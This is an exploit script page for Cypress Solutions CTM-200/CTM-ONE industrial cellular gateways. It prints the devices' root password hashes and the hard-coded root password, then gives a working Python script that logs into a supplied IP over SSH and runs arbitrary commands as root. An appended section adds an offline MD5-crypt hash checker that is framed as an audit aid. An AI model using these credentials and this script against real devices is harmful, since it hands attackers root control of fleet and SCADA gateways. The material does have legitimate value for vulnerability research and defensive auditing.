# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by an ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
#
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE ship with hard-coded credentials baked
# into their Linux distribution image (the root and admin accounts share
# one fixed password). This weakness exposes resources and functionality
# to unintended actors: anyone who can reach the Telnet or SSH service
# can log in as root and execute arbitrary commands on the gateway.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr = '''
 o ┌─┐┌┬┐┌─┐┌─┐┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬┬  o
   │  │││││ ┬├─┤├┬┘│ ││ │ │ └─┐├─┤├┤ ││
 o └─┘┴ ┴└─┘┴ ┴┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''

print(bnr)

# Usage: python3 ctm200_root.py <target-ip>
if len(sys.argv) < 2:
    print('Put an IP.')
    sys.exit()

adrs = sys.argv[1]
#
unme = 'root'       # the 'admin' account shares the same hash/password
pwrd = 'Chameleon'  # hard-coded password from /var/config/advanced.ini
#

# Log in over SSH with the hard-coded credentials. The same login works
# over Telnet; paramiko is just the convenient transport here.
rsh = paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs, username=unme, password=pwrd)

# Minimal interactive shell: each line is run as root on the gateway.
while 1:
    cmnd = input('# ')
    if cmnd == 'exit':
        break
    stdin, stdout, stderr = rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))

rsh.close()
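# The advisory header quotes the CTM-200 /var/config/passwd hash and the
# "Chameleon" string from advanced.ini, but does not show how to confirm the
# two belong together without touching a device. The block below is an added
# example written for this page; it is not part of the ZSL-2021-5686 advisory
# or of LiquidWorm's exploit. It implements the classic FreeBSD/BusyBox
# MD5-crypt ($1$) scheme with only hashlib, so it runs on current Python
# without the removed `crypt` module, and audits passwd-style text against a
# candidate list. The hash and the candidate password are copied from the
# header above; the function names and the sample passwd text are mine (the
# sample is constructed from the quoted listing). The CTM-ONE $6$ shadow
# entries are SHA512-crypt and are deliberately out of scope here.

```python
"""Offline MD5-crypt ($1$) check for hashes like the CTM-200 root entry.

Added example for this page; not part of the ZSL-2021-5686 advisory.
"""
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"

# Copied from the advisory: the hash shared by root and admin in the CTM-200
# /var/config/passwd listing, and the string carried by advanced.ini.
CTM200_ROOT_HASH = "$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0"
CANDIDATE_PASSWORD = "Chameleon"


def _to64(value: int, count: int) -> bytes:
    """Encode the low 6*count bits of value, least significant group first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD/BusyBox MD5-crypt. The salt may be given bare or as '$1$salt$...'."""
    if salt.startswith(MAGIC):
        salt = salt[len(MAGIC):]
    salt = salt.split(b"$", 1)[0][:8]          # at most 8 salt bytes

    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                        # len(password) bytes of alt
        ctx.update(alt[:min(remaining, 16)])
        remaining -= 16
    bits = len(password)
    while bits:                                 # the original's odd bit walk
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with the scheme's fixed, irregular mixing order.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()

    encoded = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (MAGIC + salt + b"$" + encoded).decode()


def verify_md5crypt(password: str, stored_hash: str) -> bool:
    """True if password reproduces stored_hash. Only $1$ hashes are handled."""
    if not stored_hash.startswith("$1$"):
        raise ValueError("not an MD5-crypt hash ($6$ entries need SHA512-crypt)")
    salt = stored_hash.split("$")[2]
    computed = md5crypt(password.encode(), salt.encode())
    return hmac.compare_digest(computed, stored_hash)


def audit_passwd(passwd_text: str, candidates: list) -> dict:
    """Map each account whose $1$ hash matches a candidate to that candidate."""
    hits = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[1].startswith("$1$"):
            continue                            # locked (*) or non-$1$ entries
        for cand in candidates:
            if verify_md5crypt(cand, fields[1]):
                hits[fields[0]] = cand
                break
    return hits


if __name__ == "__main__":
    # Constructed sample built from the CTM-200 passwd lines in the advisory.
    sample_passwd = "\n".join([
        f"root:{CTM200_ROOT_HASH}:0:0:root:/root:/bin/ash",
        f"admin:{CTM200_ROOT_HASH}:0:0:root:/root:/bin/ash",
        "nobody:*:65534:65534:nobody:/var:/bin/false",
    ])
    print(audit_passwd(sample_passwd, [CANDIDATE_PASSWORD, "admin", "root"]))
```

# Run it with python3; it prints which accounts in the sample match which
# candidate. Feed it a real /var/config/passwd pulled from a gateway to confirm
# the factory hash is still in place after a firmware update, and note that a
# device whose root/admin hash differs from CTM200_ROOT_HASH has at least had
# its password changed. For the CTM-ONE $6$ entries use a SHA512-crypt
# implementation such as passlib's sha512_crypt rather than this helper.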